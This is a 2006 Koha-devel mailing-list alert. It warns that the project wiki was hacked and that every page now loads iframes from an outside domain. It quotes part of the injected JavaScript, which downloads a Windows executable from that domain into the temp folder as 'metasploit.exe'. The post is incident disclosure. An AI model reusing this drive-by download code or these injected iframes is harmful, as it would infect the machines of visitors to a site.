[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Koha-devel] [DANGER - URGENT - WARNING - URGENT] wiki.koha.org hacked
|
From: |
Paul POULAIN |
|
Subject: |
[Koha-devel] [DANGER - URGENT - WARNING - URGENT] wiki.koha.org hacked |
|
Date: |
Tue, 26 Sep 2006 18:45:23 +0200 |
|
User-agent: |
Thunderbird 1.5.0.5 (X11/20060817) |
To everybody.
http://wiki.koha.org has been hacked : when you try to open a page,
something with a .wmf + a large javascript is loaded.
If you go to the wiki under linux/Mac OSX, it is just impossible to use.
If you go to the wiki under MS-windows, it's probably impossible to use
+ do some nasty things on your computer.
SO, AVOID GOING TO WIKI.KOHA.ORG
Kados / chris :
it seems (with lynx, that don't enjoy javascript ;-) ) that all pages
contains on the top an iframe to
IFRAME: http://uniqcount.net/adv/new.php?adv=9
IFRAME: http://uniqcount.net/adv/09/new3.php
going to this address give a page with javascript containing :
============================================
Log('Ceating the XMLHTTP object...');
var url = "http://uniqcount.net/adv/09/win32.exe";;
var xml = null;
var bin = e.Item("TEMP")+ "\\" + "metasploit.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
===========================================
metasploit.exe is something really nasty :
http://seclists.org/vuln-dev/2004/Apr/0011.html
--
Paul POULAIN et Henri Damien LAURENT
Consultants indépendants
en logiciels libres et bibliothéconomie (http://www.koha-fr.org)
Tel : 04 91 31 45 19
- [Koha-devel] [DANGER - URGENT - WARNING - URGENT] wiki.koha.org hacked,
Paul POULAIN <=